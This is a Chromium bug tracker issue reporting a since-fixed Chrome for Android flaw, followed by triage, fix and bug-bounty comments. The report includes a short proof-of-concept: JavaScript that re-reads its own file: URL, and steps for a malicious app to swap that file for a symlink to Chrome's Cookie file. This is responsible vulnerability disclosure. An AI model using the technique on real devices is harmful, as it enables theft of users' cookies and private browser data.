New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 144866 link

Starred by 2 users

Issue metadata

Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Android
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment

Security: Chrome for Android Bypassing SOP for Local Files By Symlinks

Reported by websec02...@gmail.com, Aug 26 2012

Issue description

VULNERABILITY DETAILS
Chrome for Android seems to forbid a local file to read another
file, except for the originating file itself (*). However it is
possible to circumvent the restriction by a trick using symlink.

(*) http://code.google.com/p/chromium/issues/detail?id=37586

This issue enables malicious Android apps to steal Chrome's
private files such as Cookie file, bookmark file, and so on.

As an example, steps to steal Chrome's Cookie file are described
below:

1. An attacker's app creates a malicious HTML file, and makes
   Chrome load its URL with file: scheme. The malicious HTML
   contains JavaScript code which, a few seconds later, tries
   to read the content of the same URL with the malicious HTML
   itself by XHR.

   <body>
   <u>Wait a few seconds.</u>
   <script>
   function doitjs() {
     var xhr = new XMLHttpRequest;
     xhr.onload = function() {
       alert(xhr.responseText);
     };
     xhr.open('GET', document.URL);
     xhr.send(null);
   }
   setTimeout(doitjs, 8000);
   </script>
   </body>

2. Before XHR fires, the attacker's app replaces the malicious
   HTML file with a symlink pointing to Chrome's Cookie file.

3. When XHR fires, Chrome follows the symlink and provides the
   content of the Chrome's Cookie file to the malicious HTML.

VERSION
Chrome Version: Chrome for Android v18.0.1025123
Operating System: confirmed on Android 4.0.4 (Samsung Galaxy Nexus)

REPRODUCTION CASE
A sample code of a malicious Android app is attached.

NOTE
This issue was initially reported to security@google.com on Aug. 11
2012, but recently I heard from Google security team that the issue
might not be filed in Chromium bug database. So now I re-submit
the issue here which should be a legitimate place for reporting
Chrome bugs.

This issue is a bit related to  issue #141889  in terms of using
symlink. So, like  issue #141889 , the issue described in this
report might be already fixed (but unreleased).


 
poc3.txt
2.6 KB View Download

Comment 1 by palmer@google.com, Aug 27 2012

Cc: srikanth@chromium.org klo...@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals OS-Android SecSeverity-Medium Mstone-18 SecImpacts-Stable
Owner: palmer@chromium.org
Status: Assigned
Thanks for reporting this, Takeshi!

Assigning to myself to make sure it's resolved. If not, I'll open it up to klobag and srikanth for assignment to whoever the right person is. Expect to see an update later on today.

Comment 2 by palmer@google.com, Aug 27 2012

Thanks for reporting this, Takeshi!

Assigning to myself to make sure it's resolved. If not, I'll open it up to klobag and srikanth for assignment to whoever the right person is. Expect to see an update later on today.

Comment 3 by palmer@google.com, Aug 27 2012

Cc: nileshagrawal@chromium.org
Status: FixUnreleased
As of Chrome for Android 18.0.1025289, this issue is resolved. Chrome cannot load HTML_PATH (/data/data + MY_PKG + ...) due to net::ERR_ACCESS_DENIED. An earlier patch by Nilesh, to fix http://code.google.com/p/chromium/issues/detail?id=141889, resolved a whole class of file access attacks.

On an earlier version, 18.0.1025.166 (Official Build 143067), the exploit works perfectly as expected, so I am confident the fix is good. The fixed version should be out soon (early September, they say).

Comment 4 by palmer@chromium.org, Sep 11 2012

Labels: reward-topanel

Comment 5 by palmer@chromium.org, Sep 12 2012

Labels: -reward-topanel reward-unpaid reward-500

Comment 6 by palmer@chromium.org, Sep 13 2012

Another $500 for Takeshi. Thanks for your good work!

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----
Project Member

Comment 7 by bugdroid1@chromium.org, Oct 14 2012

Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Labels: -reward-unpaid
Payment in system as part of $2500 batch

Comment 9 by jsc...@chromium.org, Dec 20 2012

Status: Fixed
Project Member

Comment 10 by bugdroid1@chromium.org, Jan 18 2013

Labels: Restrict-View-EditIssue
Restrict-View-EditIssue is preferred since it allows anyone who can edit an issue (committers and contributors) to view the bug.
Project Member

Comment 11 by bugdroid1@chromium.org, Jan 18 2013

Restrict-View-EditIssue is preferred since it allows anyone who can edit an issue (committers and contributors) to view the bug.
Project Member

Comment 12 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-Internals -SecSeverity-Medium -Mstone-18 -SecImpacts-Stable Security-Severity-Medium M-18 Cr-Internals Security-Impact-Stable Type-Bug-Security
Project Member

Comment 13 by bugdroid1@chromium.org, Mar 13 2013

Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityTeam
Labels: -Restrict-View-EditIssue
Project Member

Comment 16 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 17 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-Medium Security_Severity-Medium

Comment 18 by palmer@google.com, Oct 4 2013

Cc: dfalcant...@chromium.org
+dfalcantara FYI
Project Member

Comment 19 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 20 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 21 by sheriffbot@chromium.org, Oct 2 2016

Labels: Restrict-View-SecurityNotify
Labels: allpublic
Project Member

Comment 23 by sheriffbot@chromium.org, Oct 3 2016

Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment